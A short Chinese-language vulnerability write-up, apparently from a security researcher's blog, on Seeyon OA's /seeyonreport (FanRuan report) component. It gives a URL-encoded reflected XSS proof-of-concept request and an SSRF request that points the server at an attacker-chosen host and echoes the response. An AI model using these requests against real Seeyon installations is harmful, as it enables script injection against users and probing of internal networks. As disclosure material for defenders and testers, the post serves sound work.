LandGrey's Blog

比较简单的漏洞

致远OA /seeyonreport 路径下的组件其实是集成的 帆软报表

简单在版本

致远A8-V5 V5.6 SP1
致远A8-V5 V6.1 SP2

下测试存在，少部分站点不存在

XSS

无限制的反射型 XSS

/seeyonreport/ReportServer?reportlet=&__parameters__=%7b%22%69%73%53%75%62%52%65%70%6f%72%74%22%3a%22%74%72%75%65%22%2c%22%54%45%4d%50%4c%41%54%45%49%44%22%3a%22%31%22%2c%22%4d%45%4d%42%45%52%49%44%22%3a%22%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%27%78%73%73%2d%62%79%2d%4c%61%6e%64%47%72%65%79%27%29%3e%22%2c%22%41%38%53%45%52%56%45%52%49%50%22%3a%22%62%61%69%64%75%2e%63%6f%6d%22%2c%22%41%38%53%45%52%56%45%52%50%4f%52%54%22%3a%22%38%30%22%7d

SSRF

这个有点特殊，POST请求型的 SSRF, 默认就带几个参数；

/seeyonreport/ReportServer?reportlet=1&a8ServerIp=ip&a8ServerPort=80/ssrf-by-LandGrey%23&templateId=20&memberId=10

请求完毕后可以回显部分请求结果。